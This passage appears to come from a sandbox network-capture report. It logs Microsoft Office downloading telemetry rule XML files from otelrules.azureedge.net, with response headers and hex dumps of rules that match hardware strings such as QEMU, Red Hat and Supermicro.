                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 7057cc02-501e-008f-16cc-459054000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010028Z-1746fd949bd77mkmhC1EWR5efc00000000q000000000h7w7
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:29 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    63192.168.2.64976913.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:28 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:29 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 474
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 266d3408-201e-000c-01b3-4279c4000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010029Z-174f7845968swgbqhC1EWRmnb400000016vg00000000cqts
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:29 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    64192.168.2.64977013.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:29 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:29 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 408
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 68175a90-d01e-0065-3ed1-45b77a000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010029Z-1746fd949bdwt8wrhC1EWRu6rg00000000kg00000000c9vu
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:29 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    65192.168.2.64977113.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:29 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:30 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 469
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: bcf9f347-101e-007a-60d2-45047e000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010030Z-1746fd949bd54zxghC1EWRzre400000000vg000000000y8d
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:30 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    66192.168.2.64977213.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:30 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:30 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 416
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 2aa810bc-801e-008f-63c1-452c5d000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010030Z-1746fd949bddgsvjhC1EWRum2c00000000p000000000ncbu
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:30 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    67192.168.2.64977313.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:31 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:31 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 26f79bf1-901e-0083-7ec4-45bb55000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010031Z-1746fd949bd9x4mhhC1EWRb76n00000000g0000000001st5
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:31 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    68192.168.2.64977413.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:31 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:31 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 432
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: b5b643f2-a01e-0021-77f9-44814c000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010031Z-174f78459685m244hC1EWRgp2c00000016g000000000gha8
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:31 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    69192.168.2.64977513.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:31 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:32 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 475
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 4879dc54-201e-0096-5ac3-45ace6000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010031Z-1746fd949bddgsvjhC1EWRum2c00000000tg000000006wdd
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:32 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    70192.168.2.64977713.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:32 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:32 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 474
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 85a1d3f6-901e-005b-3ecd-452005000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010032Z-1746fd949bd9x4mhhC1EWRb76n00000000kg000000001wta
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:33 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    71192.168.2.64977613.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:33 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
